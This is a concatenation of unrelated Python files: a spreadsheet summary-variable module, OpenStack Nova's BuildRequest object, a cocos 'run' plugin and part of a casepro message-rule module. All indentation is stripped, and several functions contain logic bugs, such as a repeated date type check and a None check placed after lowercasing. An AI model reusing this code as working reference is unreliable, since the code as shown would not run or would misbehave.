External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
## Custom methods
def is_template(self):
""" Verify that the object is a template
Returns:
(bool): True if the object is a template
"""
return True
def is_from_template(self):
""" Verify if the object has been instantiated from a template
Note:
The object has to be fetched. Otherwise, it does not
have information from its parent
Returns:
(bool): True if the object is a template
"""
return False
|
|
import datetime
import pandas as pd
from xlsxwriter.workbook import Workbook
from paperpusher import spreadsheet
class SummaryVariable():
"""Directions for how to summarize a given varaible
Attributes:
name: The summary variable's name
variables: a list of variables
methods: [list] A list of string method names
groups : [list] a of Group objects applied to this summary variable
method_spreadsheet_columns: [dictionary] dictionary in the form
{"method_name" : column number}
where the column number correspond to the column of the method name in the spreadsheet
subheader_row_num : [int] subheader row number in the worksheet
last_group_row_num : [int] row number of the last group in the worksheet
"""
def __init__(self, name, variables = [], methods = []):
self.name = name
self.variables = variables # a list of variables
self.methods = methods
self.method_spreadsheet_columns = {}
self.groups = []
def apply_method(self, data_frame, method_name, group):
"""Applied the method specified by string to this variable
Args:
data_frame: A pandas dataframe object
method_name: string representing one of the SummaryVariable analytic methods
group : [Group] a group to subset the data frame by
Returns:
Returns the return value of a specified method. If no method matches
the string, returns null.
"""
# total number of observations before subsetting by applying group condition
total_num_observations = len(data_frame.index)
# apply groups
data_frame = self.apply_group(data_frame, group)
if method_name == "min":
return self.min(data_frame)
elif method_name == "max":
return self.max(data_frame)
elif method_name == "mean":
return self.mean(data_frame)
elif method_name == "median":
return self.median(data_frame)
elif method_name == "sum":
return self.sum(data_frame)
elif method_name == "percent_of_sum":
return self.percent_of_sum(data_frame)
elif method_name == "percent_of_average":
return self.percent_of_average(data_frame)
elif method_name == "percent_of_obs":
return self.percent_of_obs(data_frame, total_num_observations)
elif method_name == "percent_of_group":
return self.percent_of_group(data_frame)
return None
def apply_group(self, data_frame, group):
"""Returns a subset of the data frame based on the groups specified
Args:
data_frame: Pandas data frame
group : [Group] a group object
Returns:
Subset of pandas data frame. If no where clause, the original data_frame is returned
"""
if group.is_subset:
if group.variable_must_be == "equal":
data_frame = data_frame[data_frame[group.variable_name] == group.variable_values[0]]
elif group.variable_must_be == "less_than":
data_frame = data_frame[data_frame[group.variable_name] < group.variable_values[0]]
elif group.variable_must_be == "greater_than_equal_to":
data_frame = data_frame[data_frame[group.variable_name] >= group.variable_values[0]]
return data_frame
def get_method_display_name(self, method_name):
"""Returns a user friendly display name for the method
Args:
method_name: a string method name corresponding to a summary method
Returns:
A friendly method display name
"""
if method_name == "min":
return "Minimum"
elif method_name == "max":
return "Maximum"
elif method_name == "mean":
return "Average"
elif method_name == "median":
return "Median"
elif method_name == "sum":
return "Sum"
elif method_name == "percent_of_sum" or method_name == "percent_of_average":
return "Percent of " + self.variables[1]
elif method_name == "percent_of_obs":
return "Percent of observations"
elif method_name == "percent_of_group":
return "Percent of group"
return method_name
# evaluative methods
def min(self, data_frame):
return data_frame[self.variables[0]].min()
def max(self, data_frame):
return data_frame[self.variables[0]].max()
def mean(self, data_frame):
return data_frame[self.variables[0]].mean()
def median(self, data_frame):
return data_frame[self.variables[0]].median()
def sum(self, data_frame):
return data_frame[self.variables[0]].sum()
def percent_of_sum(self, data_frame):
"""Returns sum of variable[0] divided by sum of variable[1]
"""
sum_variable_one = data_frame[self.variables[0]].sum()
sum_variable_two = data_frame[self.variables[1]].sum()
return (sum_variable_one/sum_variable_two)*100
def percent_of_average(self, data_frame):
"""Returns the average of variable[0] divided by average of variable[1]
"""
average_variable_one = data_frame[self.variables[0]].mean()
average_variable_two = data_frame[self.variables[1]].mean()
if (average_variable_two)*-1 > 0:
return (average_variable_one/average_variable_two)*100
return "---"
def percent_of_obs(self, data_frame, total_num_observations):
"""Returns the sum of variable[0] divided by the total number of
observations in the data frame before subsetting by groups
"""
sum_variable_one = data_frame[self.variables[0]].sum()
if total_num_observations > 0:
return (sum_variable_one/total_num_observations)*100
return "---"
def percent_of_group(self, data_frame):
"""Returns the sum of variable[0] divided by the number of observations in the group
"""
sum_variable_one = data_frame[self.variables[0]].sum()
group_observations = len(data_frame.index)
if group_observations > 0:
return (sum_variable_one/group_observations)*100
return "---"
class Group():
""" Directives to restrict a data frame based on group
Attributes:
name : [string] the name of the group
variable_must_be : [string] one of the must_be values
variable_values : [list] a list of values to be evalutaed using the "variable_must_be" operator
is_subset : [boolean] indicates if the group is a subset of the data frame
"""
def __init__(self, name, variable_name, variable_must_be, variable_values = [], is_subset = True):
self.name = name
self.variable_name = variable_name
self.variable_must_be = variable_must_be
self.variable_values = variable_values
self.is_subset = is_subset
class BasicVariable():
"""Model for a basic, non-transformed, variable
Represents the model for a basic report variable, such as "First name" or "Sex".
Attributes:
name: The name of the variable, such as "First name". This name should correspond
with the header column name used in a user's spreadsheet.
data_type: The data type for this variable. Data types are
* date
* string
* integer
* float
* boolean
is_transform: A boolean attribute indicating whether this variable is a basic, unmodified
variable such as "First name", or if the variable requires some transformation - such
as being the composite of two or more variables or having some mathematical operation
performed on it.
"""
def __init__(self, name, data_type = None):
self.name = name
self.data_type = data_type
self.is_transform = False
def __string__(self):
return name
class TransformVariable(BasicVariable):
"""Model for a transformed variable
The TransformVariable extends the BasicVariable and represents a variable that is
either a composite or requires some type of mathematical transformation, using one
or more variables from a user's spreadsheet.
Attributes:
variables: A list of variable objects used to create the transformed variable
transform_method: A string indicating which transform method (one of the methods on this
TransformVariable object) that should be used. For example, "date_diff_days".
arguments: A list of argument other than variable names to be passed to the transform method.
For example, using the "begins_with" method the arugments attribute might be ["begins with this?"]
"""
def __init__(self, name, data_type):
self.name = name
self.data_type = data_type
self.is_transform = True
self.variables = []
self.transform_method = None
self.arguments = []
def date_diff_days(self, oldest_date, newest_date):
"""
Compares two dates and returns an difference integer in days.
Args:
oldest_date: The oldest datetime object
newst_date: The newest datetime object
Returns:
Returns null if either date passsed is not of type date, otherwise returns
an integer value indicate the number of days between the two dates.
"""
if type(newest_date) is datetime.date and type(newest_date) is datetime.date:
date_diff = (newest_date - oldest_date).days
return date_diff
return None
def begins_with(self, cell_values, begins_with):
"""Determines if a set of cell contents begins with a given string.
Args:
cell_values: A list of cell values from a spreadsheet
begins_with: A string to check if each cell value begins with
Returns:
Returns an integer 1 to indcate all cells do begin with the passed value, an integer
0 to indicate one or more of the cells do not begin with the passed value, and returns
null if one or more of the passed cell_contents is is null.
"""
begins_with = str.lower(begins_with)
for cell_value in cell_values:
cell_value = str.lower(cell_value)
if cell_value is None:
return None
elif not cell_value.startswith(begins_with):
return 0
return 1
def not_empty(self, cell_values):
"""Determines if the contents of cell values are empty or not
If one of the cell values passed is empty, returns 0, otherwise
returns 1, indicating the cell values are not empty.
Args:
cell_values: A list of cell values from a spreadsheet.
Returns:
An integer (0 or 1) indicating a cell is not empty (1)
or is empty (0).
"""
for cell_value in cell_values:
cell_value = str.lower(cell_value).strip()
if cell_value == None or cell_value == "":
return 0
return 1
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import re
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import versionutils
from oslo_versionedobjects import exception as ovoo_exc
from nova.db.api import api as api_db_api
from nova.db.api import models as api_models
from nova.db import utils as db_utils
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
LOG = logging.getLogger(__name__)
@base.NovaObjectRegistry.register
class BuildRequest(base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Added block_device_mappings
# Version 1.2: Added save() method
# Version 1.3: Added tags
VERSION = '1.3'
fields = {
'id': fields.IntegerField(),
'instance_uuid': fields.UUIDField(),
'project_id': fields.StringField(),
'instance': fields.ObjectField('Instance'),
'block_device_mappings': fields.ObjectField('BlockDeviceMappingList'),
# NOTE(alaski): Normally these would come from the NovaPersistentObject
# mixin but they're being set explicitly because we only need
# created_at/updated_at. There is no soft delete for this object.
'created_at': fields.DateTimeField(nullable=True),
'updated_at': fields.DateTimeField(nullable=True),
'tags': fields.ObjectField('TagList'),
}
def obj_make_compatible(self, primitive, target_version):
super(BuildRequest, self).obj_make_compatible(primitive,
target_version)
target_version = versionutils.convert_version_to_tuple(target_version)
if target_version < (1, 1) and 'block_device_mappings' in primitive:
del primitive['block_device_mappings']
elif target_version < (1, 3) and 'tags' in primitive:
del primitive['tags']
def _load_instance(self, db_instance):
# NOTE(alaski): Be very careful with instance loading because it
# changes more than most objects.
try:
self.instance = objects.Instance.obj_from_primitive(
jsonutils.loads(db_instance))
except TypeError:
LOG.debug('Failed to load instance from BuildRequest with uuid '
'%s because it is None', self.instance_uuid)
raise exception.BuildRequestNotFound(uuid=self.instance_uuid)
except ovoo_exc.IncompatibleObjectVersion:
# This should only happen if proper service upgrade strategies are
# not followed. Log the exception and raise BuildRequestNotFound.
# If the instance can't be loaded this object is useless and may
# as well not exist.
LOG.debug('Could not deserialize instance store in BuildRequest '
'with uuid %(instance_uuid)s. Found version %(version)s '
'which is not supported here.',
dict(instance_uuid=self.instance_uuid,
version=jsonutils.loads(
db_instance)["nova_object.version"]))
LOG.exception('Could not deserialize instance in BuildRequest')
raise exception.BuildRequestNotFound(uuid=self.instance_uuid)
# NOTE(sbauza): The instance primitive should already have the deleted
# field being set, so when hydrating it back here, we should get the
# right value but in case we don't have it, let's suppose that the
# instance is not deleted, which is the default value for that field.
# NOTE(mriedem): Same for the "hidden" field.
self.instance.obj_set_defaults('deleted', 'hidden')
# NOTE(alaski): Set some fields on instance that are needed by the api,
# not lazy-loadable, and don't change.
self.instance.disable_terminate = False
self.instance.terminated_at = None
self.instance.host = None
self.instance.node = None
self.instance.launched_at = None
self.instance.launched_on = None
self.instance.cell_name = None
# The fields above are not set until the instance is in a cell at
# which point this BuildRequest will be gone. locked_by could
# potentially be set by an update so it should not be overwritten.
if not self.instance.obj_attr_is_set('locked_by'):
self.instance.locked_by = None
# created_at/updated_at are not on the serialized instance because it
# was never persisted.
self.instance.created_at = self.created_at
self.instance.updated_at = self.updated_at
self.instance.tags = self.tags
def _load_block_device_mappings(self, db_bdms):
# 'db_bdms' is a serialized BlockDeviceMappingList object. If it's None
# we're in a mixed version nova-api scenario and can't retrieve the
# actual list. Set it to an empty list here which will cause a
# temporary API inconsistency that will be resolved as soon as the
# instance is scheduled and on a compute.
if db_bdms is None:
LOG.debug('Failed to load block_device_mappings from BuildRequest '
'for instance %s because it is None', self.instance_uuid)
self.block_device_mappings = objects.BlockDeviceMappingList()
return
self.block_device_mappings = (
objects.BlockDeviceMappingList.obj_from_primitive(
jsonutils.loads(db_bdms)))
def _load_tags(self, db_tags):
# 'db_tags' is a serialized TagList object. If it's None
# we're in a mixed version nova-api scenario and can't retrieve the
# actual list. Set it to an empty list here which will cause a
# temporary API inconsistency that will be resolved as soon as the
# instance is scheduled and on a compute.
if db_tags is None:
LOG.debug('Failed to load tags from BuildRequest '
'for instance %s because it is None', self.instance_uuid)
self.tags = objects.TagList()
return
self.tags = (
objects.TagList.obj_from_primitive(
jsonutils.loads(db_tags)))
@staticmethod
def _from_db_object(context, req, db_req):
# Set this up front so that it can be pulled for error messages or
# logging at any point.
req.instance_uuid = db_req['instance_uuid']
for key in req.fields:
if key == 'instance':
continue
elif isinstance(req.fields[key], fields.ObjectField):
try:
getattr(req, '_load_%s' % key)(db_req[key])
except AttributeError:
LOG.exception('No load handler for %s', key)
else:
setattr(req, key, db_req[key])
# Load instance last because other fields on req may be referenced
req._load_instance(db_req['instance'])
req.obj_reset_changes(recursive=True)
req._context = context
return req
@staticmethod
@api_db_api.context_manager.reader
def _get_by_instance_uuid_from_db(context, instance_uuid):
db_req = context.session.query(api_models.BuildRequest).filter_by(
instance_uuid=instance_uuid).first()
if not db_req:
raise exception.BuildRequestNotFound(uuid=instance_uuid)
return db_req
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_req = cls._get_by_instance_uuid_from_db(context, instance_uuid)
return cls._from_db_object(context, cls(), db_req)
@staticmethod
@api_db_api.context_manager.writer
def _create_in_db(context, updates):
db_req = api_models.BuildRequest()
db_req.update(updates)
db_req.save(context.session)
return db_req
def _get_update_primitives(self):
updates = self.obj_get_changes()
for key, value in updates.items():
if isinstance(self.fields[key], fields.ObjectField):
updates[key] = jsonutils.dumps(value.obj_to_primitive())
return updates
@base.remotable
def create(self):
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(action='create',
reason='already created')
if not self.obj_attr_is_set('instance_uuid'):
# We can't guarantee this is not null in the db so check here
raise exception.ObjectActionError(action='create',
reason='instance_uuid must be set')
updates = self._get_update_primitives()
db_req = self._create_in_db(self._context, updates)
self._from_db_object(self._context, self, db_req)
@staticmethod
@api_db_api.context_manager.writer
def _destroy_in_db(context, instance_uuid):
result = context.session.query(api_models.BuildRequest).filter_by(
instance_uuid=instance_uuid).delete()
if not result:
raise exception.BuildRequestNotFound(uuid=instance_uuid)
@base.remotable
def destroy(self):
self._destroy_in_db(self._context, self.instance_uuid)
@api_db_api.context_manager.writer
def _save_in_db(self, context, req_id, updates):
db_req = context.session.query(
api_models.BuildRequest).filter_by(id=req_id).first()
if not db_req:
raise exception.BuildRequestNotFound(uuid=self.instance_uuid)
db_req.update(updates)
context.session.add(db_req)
return db_req
@base.remotable
def save(self):
updates = self._get_update_primitives()
db_req = self._save_in_db(self._context, self.id, updates)
self._from_db_object(self._context, self, db_req)
def get_new_instance(self, context):
# NOTE(danms): This is a hack to make sure that the returned
# instance has all dirty fields. There are probably better
# ways to do this, but they kinda involve o.vo internals
# so this is okay for the moment.
instance = objects.Instance(context)
for field in self.instance.obj_fields:
# NOTE(danms): Don't copy the defaulted tags field
# as instance.create() won't handle it properly.
# TODO(zhengzhenyu): Handle this when the API supports creating
# servers with tags.
if field == 'tags':
continue
if self.instance.obj_attr_is_set(field):
setattr(instance, field, getattr(self.instance, field))
return instance
@base.NovaObjectRegistry.register
class BuildRequestList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('BuildRequest'),
}
@staticmethod
@api_db_api.context_manager.reader
def _get_all_from_db(context):
query = context.session.query(api_models.BuildRequest)
if not context.is_admin:
query = query.filter_by(project_id=context.project_id)
db_reqs = query.all()
return db_reqs
@base.remotable_classmethod
def get_all(cls, context):
db_build_reqs = cls._get_all_from_db(context)
return base.obj_make_list(context, cls(context), objects.BuildRequest,
db_build_reqs)
@staticmethod
def _pass_exact_filters(instance, filters):
for filter_key, filter_val in filters.items():
if filter_key in ('metadata', 'system_metadata'):
if isinstance(filter_val, list):
for item in filter_val:
for k, v in item.items():
if (k not in instance.metadata or
v != instance.metadata[k]):
return False
else:
for k, v in filter_val.items():
if (k not in instance.metadata or
v != instance.metadata[k]):
return False
elif filter_key in (
'tags', 'tags-any', 'not-tags', 'not-tags-any'):
# Get the list of simple string tags first.
tags = ([tag.tag for tag in instance.tags]
if instance.tags else [])
if filter_key == 'tags':
for item in filter_val:
if item not in tags:
return False
elif filter_key == 'tags-any':
found = []
for item in filter_val:
if item in tags:
found.append(item)
if not found:
return False
elif filter_key == 'not-tags':
found = []
for item in filter_val:
if item in tags:
found.append(item)
if len(found) == len(filter_val):
return False
elif filter_key == 'not-tags-any':
for item in filter_val:
if item in tags:
return False
elif isinstance(filter_val, (list, tuple, set, frozenset)):
if not filter_val:
# Special value to indicate that nothing will match.
return None
if instance.get(filter_key, None) not in filter_val:
return False
else:
if instance.get(filter_key, None) != filter_val:
return False
return True
@staticmethod
def _pass_regex_filters(instance, filters):
for filter_name, filter_val in filters.items():
try:
instance_attr = getattr(instance, filter_name)
except AttributeError:
continue
# Sometimes the REGEX filter value is not a string
if not isinstance(filter_val, str):
filter_val = str(filter_val)
filter_re = re.compile(filter_val)
if instance_attr and not filter_re.search(str(instance_attr)):
return False
return True
@staticmethod
def _sort_build_requests(build_req_list, sort_keys, sort_dirs):
# build_req_list is a [] of build_reqs
sort_keys.reverse()
sort_dirs.reverse()
def sort_attr(sort_key, build_req):
if sort_key == 'id':
# 'id' is not set on the instance yet. Use the BuildRequest
# 'id' instead.
return build_req.id
return getattr(build_req.instance, sort_key)
for sort_key, sort_dir in zip(sort_keys, sort_dirs):
reverse = False if sort_dir.lower().startswith('asc') else True
build_req_list.sort(key=functools.partial(sort_attr, sort_key),
reverse=reverse)
return build_req_list
@base.remotable_classmethod
def get_by_filters(cls, context, filters, limit=None, marker=None,
sort_keys=None, sort_dirs=None):
# Short-circuit on anything that will not yield results.
# 'deleted' records can not be returned from here since build_requests
# are not soft deleted.
# 'cleaned' records won't exist as they would need to be deleted.
if (limit == 0 or
filters.get('deleted', False) or
filters.get('cleaned', False)):
# If we have a marker honor the MarkerNotFound semantics.
if marker:
raise exception.MarkerNotFound(marker=marker)
return cls(context, objects=[])
# Because the build_requests table stores an instance as a serialized
# versioned object it is not feasible to do the filtering and sorting
# in the database. Just get all potentially relevant records and
# process them here. It should be noted that build requests are short
# lived so there should not be a lot of results to deal with.
build_requests = cls.get_all(context)
# Fortunately some filters do not apply here.
# 'changes-since' works off of the updated_at field which has not yet
# been set at the point in the boot process where build_request still
# exists. So it can be ignored.
# 'deleted' and 'cleaned' are handled above.
sort_keys, sort_dirs = db_utils.process_sort_params(
sort_keys, sort_dirs, default_dir='desc')
# For other filters that don't match this, we will do regexp matching
# Taken from db/sqlalchemy/api.py
exact_match_filter_names = ['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'task_state',
'system_metadata', 'tags', 'tags-any',
'not-tags', 'not-tags-any']
exact_filters = {}
regex_filters = {}
for key, value in filters.items():
if key in exact_match_filter_names:
exact_filters[key] = value
else:
regex_filters[key] = value
# As much as possible this copies the logic from db/sqlalchemy/api.py
# instance_get_all_by_filters_sort. The main difference is that method
# builds a sql query and this filters in python.
filtered_build_reqs = []
for build_req in build_requests:
instance = build_req.instance
filter_result = cls._pass_exact_filters(instance, exact_filters)
if filter_result is None:
# The filter condition is such that nothing will match.
# Bail early.
return cls(context, objects=[])
if filter_result is False:
continue
if not cls._pass_regex_filters(instance, regex_filters):
continue
filtered_build_reqs.append(build_req)
if (((len(filtered_build_reqs) < 2) or (not sort_keys)) and
not marker):
# No need to sort
return cls(context, objects=filtered_build_reqs)
sorted_build_reqs = cls._sort_build_requests(filtered_build_reqs,
sort_keys, sort_dirs)
marker_index = 0
if marker:
for i, build_req in enumerate(sorted_build_reqs):
if build_req.instance.uuid == marker:
# The marker is the last seen item in the last page, so
# we increment the index to the next item immediately
# after the marker so the marker is not returned.
marker_index = i + 1
break
else:
raise exception.MarkerNotFound(marker=marker)
len_build_reqs = len(sorted_build_reqs)
limit_index = len_build_reqs
if limit:
limit_index = marker_index + limit
if limit_index > len_build_reqs:
limit_index = len_build_reqs
return cls(context,
objects=sorted_build_reqs[marker_index:limit_index])
|
|
#!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Authr: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
from MultiLanguage import MultiLanguage
import BaseHTTPServer
import webbrowser
import threading
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return MultiLanguage.get_string('RUN_BRIEF')
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help=MultiLanguage.get_string('RUN_ARG_MODE'))
group = parser.add_argument_group(MultiLanguage.get_string('RUN_ARG_GROUP_WEB'))
group.add_argument("-b", "--browser", dest="browser",
help=MultiLanguage.get_string('RUN_ARG_BROWSER'))
group.add_argument("--param", dest="param",
help=MultiLanguage.get_string('RUN_ARG_PARAM'))
group.add_argument("--port", dest="port", metavar="SERVER_PORT", nargs='?',
help=MultiLanguage.get_string('RUN_ARG_PORT'))
group.add_argument("--host", dest="host", metavar="SERVER_HOST", nargs='?', default='127.0.0.1',
help=MultiLanguage.get_string('RUN_ARG_HOST'))
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
self._host = args.host
self._browser = args.browser
self._param = args.param
def get_ios_sim_name(self):
# get the version of xcodebuild
ver = cocos.get_xcode_version()
if ver.startswith("5"):
ret = "ios-sim-xcode5"
else:
ret = "ios-sim-xcode6"
return ret
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
if deploy_dep._use_sdk == 'iphoneos':
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_IOS_FOR_DEVICE_FMT',
os.path.dirname(deploy_dep._iosapp_path)))
else:
if getattr(sys, 'frozen', None):
cur_dir = os.path.realpath(os.path.dirname(sys.executable))
else:
cur_dir = os.path.realpath(os.path.dirname(__file__))
iossim_exe_path = os.path.join(cur_dir, 'bin', self.get_ios_sim_name())
launch_sim = "%s launch \"%s\" &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = '\"%s/Contents/MacOS/%s\"' % (deploy_dep._macapp_path, deploy_dep.target_name)
self._run_cmd(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(sdk_root, 'platform-tools', 'adb'))
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
pass
def open_webbrowser(self, url):
if self._browser is None:
threading.Event().wait(1)
webbrowser.open_new(url)
else:
if cocos.os_is_mac():
if self._param is None:
url_cmd = "open -a \"%s\" \"%s\"" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
else:
if self._param is None:
url_cmd = "\"%s\" %s" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
self._run_cmd(url_cmd)
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
HandlerClass.protocol_version = Protocol
host = self._host
if self._port is None:
port = 8000
port_max_add = 2000
else:
port = int(self._port)
port_max_add = 0
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
i = 0
httpd = None
while (i <= port_max_add):
port += i
i += 1
server_address = (host, port)
try:
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_HOST_PORT_FMT', (host, port)))
httpd = ServerClass(server_address, HandlerClass)
except Exception as e:
httpd = None
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_SERVER_FAILED_FMT', (host, port, e)))
if httpd is not None:
break
if httpd is None:
raise cocos.CCPluginError(MultiLanguage.get_string('RUN_ERROR_START_SERVER_FAILED'),
cocos.CCPluginError.ERROR_OTHERS)
from threading import Thread
sub_url = deploy_dep.sub_url
url = 'http://%s:%s%s' % (host, port, sub_url)
thread = Thread(target = self.open_webbrowser, args = (url,))
thread.start()
sa = httpd.socket.getsockname()
with cocos.pushd(run_root):
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_SERVING_FMT', (sa[0], sa[1])))
httpd.serve_forever()
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run_wp8(self, dependencies):
if not self._platforms.is_wp8_active():
return
deploy_dep = dependencies['deploy']
xap_path = deploy_dep.xap_path
deploy_tool = deploy_dep.deploy_tool
cmd = '"%s" /installlaunch "%s" /targetDevice:xd' % (deploy_tool, xap_path)
self._run_cmd(cmd)
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_START_APP'))
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
self.run_wp8(dependencies)
|
|
import json
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from enum import Enum
import regex
from dash.orgs.models import Org
from dash.utils import get_obj_cacheable
from django.db import models
from django.utils.translation import ugettext_lazy as _
from casepro.contacts.models import Group
from casepro.msgs.models import Label, Message
from casepro.utils import json_encode, normalize
KEYWORD_REGEX = regex.compile(r"^\w[\w\- ]*\w$", flags=regex.UNICODE | regex.V0)
class Quantifier(Enum):
"""
Tests are typically composed of multiple conditions, e.g. contains ANY of X, Y or Z.
"""
NONE = (1, _("none of"))
ANY = (2, _("any of"))
ALL = (3, _("all of"))
def __init__(self, val, text):
self.val = val
self.text = text
@classmethod
def from_json(cls, val):
return cls[val.upper()]
def to_json(self):
return self.name.lower()
def evaluate(self, condition_callables):
if self == Quantifier.NONE:
for condition in condition_callables:
if condition():
return False
return True
elif self == Quantifier.ANY:
for condition in condition_callables:
if condition():
return True
return False
elif self == Quantifier.ALL:
for condition in condition_callables:
if not condition():
return False
return True
def __str__(self):
return str(self.text)
class DeserializationContext(object):
"""
Context object passed to all test or action from_json methods
"""
def __init__(self, org):
self.org = org
class Test(object):
"""
A test which can be evaluated to true or false on a given message
"""
__metaclass__ = ABCMeta
TYPE = None
CLASS_BY_TYPE = None # lazily initialized below
@classmethod
def from_json(cls, json_obj, context):
if not cls.CLASS_BY_TYPE:
cls.CLASS_BY_TYPE = {
ContainsTest.TYPE: ContainsTest,
WordCountTest.TYPE: WordCountTest,
GroupsTest.TYPE: GroupsTest,
FieldTest.TYPE: FieldTest,
}
test_type = json_obj["type"]
test_cls = cls.CLASS_BY_TYPE.get(test_type, None)
if not test_cls: # pragma: no cover
raise ValueError("Unknown test type: %s" % test_type)
return test_cls.from_json(json_obj, context)
@abstractmethod
def to_json(self): # pragma: no cover
pass
@abstractmethod
def get_description(self): # pragma: no cover
pass
@abstractmethod
def matches(self, message):
"""
Subclasses must implement this to return a boolean.
"""
def __eq__(self, other): # pragma: no cover
return other and self.TYPE == other.TYPE
def __ne__(self, other):
return not self.__eq__(other)
class ContainsTest(Test):
"""
Test that returns whether the message text contains or doesn't contain the given keywords
"""
TYPE = "contains"
def __init__(self, keywords, quantifier):
self.keywords = [normalize(word) for word in keywords]
self.quantifier = quantifier
@classmethod
def from_json(cls, json_obj, context):
return cls(json_obj["keywords"], Quantifier.from_json(json_obj["quantifier"]))
def to_json(self):
return {"type": self.TYPE, "keywords": self.keywords, "quantifier": self.quantifier.to_json()}
def get_description(self):
quoted_keywords = ['"%s"' % w for w in self.keywords]
return "message contains %s %s" % (str(self.quantifier), ", ".join(quoted_keywords))
def matches(self, message):
text = normalize(message.text)
def keyword_check(w):
return lambda: bool(regex.search(r"\b" + w + r"\b", text, flags=regex.UNICODE | regex.V0))
checks = [keyword_check(keyword) for keyword in self.keywords]
return self.quantifier.evaluate(checks)
@classmethod
def is_valid_keyword(cls, keyword):
return KEYWORD_REGEX.match(keyword)
def __eq__(self, other):
return (
other
and self.TYPE == other.TYPE
and self.keywords == other.keywords
and self.quantifier == other.quantifier
)
class WordCountTest(Test):
"""
Test that returns whether the message text contains at least the given number of words
"""
TYPE = "words"
def __init__(self, minimum):
self.minimum = minimum
@classmethod
def from_json(cls, json_obj, context):
return cls(json_obj["minimum"])
def to_json(self):
return {"type": self.TYPE, "minimum": self.minimum}
def get_description(self):
return "message has at least %d words" % self.minimum
def matches(self, message):
num_words = len(regex.findall(r"\w+", message.text, flags=regex.UNICODE | regex.V0))
return num_words >= self.minimum
def __eq__(self, other):
return other and self.TYPE == other.TYPE and self.minimum == other.minimum
class GroupsTest(Test):
"""
Test that returns whether the message was sent from the given contact groups
"""
TYPE = "groups"
def __init__(self, groups, quantifier):
self.groups = groups
self.quantifier = quantifier
@classmethod
def from_json(cls, json_obj, context):
groups = list(Group.objects.filter(org=context.org, pk__in=json_obj["groups"]).order_by("pk"))
return cls(groups, Quantifier.from_json(json_obj["quantifier"]))
def to_json(self):
return {"type": self.TYPE, "groups": [g.pk for g in self.groups], "quantifier": self.quantifier.to_json()}
def get_description(self):
group_names = [g.name for g in self.groups]
return "contact belongs to %s %s" % (str(self.quantifier), ", ".join(group_names))
def matches(self, message):
contact_groups = set(message.contact.groups.all())
def group_check(g):
return lambda: g in contact_groups
checks = [group_check(group) for group in self.groups]
return self.quantifier.evaluate(checks)
def __eq__(self, other):
return (
other and self.TYPE == other.TYPE and self.groups == other.groups and self.quantifier == other.quantifier
)
class FieldTest(Test):
"""
Test that returns whether the message was sent from a contact with the given field value
"""
TYPE = "field"
def __init__(self, key, values):
self.key = key
self.values = [normalize(v) for v in values]
@classmethod
def from_json(cls, json_obj, context):
return cls(json_obj["key"], json_obj["values"])
def to_json(self):
return {"type": self.TYPE, "key": self.key, "values": self.values}
def get_description(self):
quoted_values = ['"%s"' % v for v in self.values]
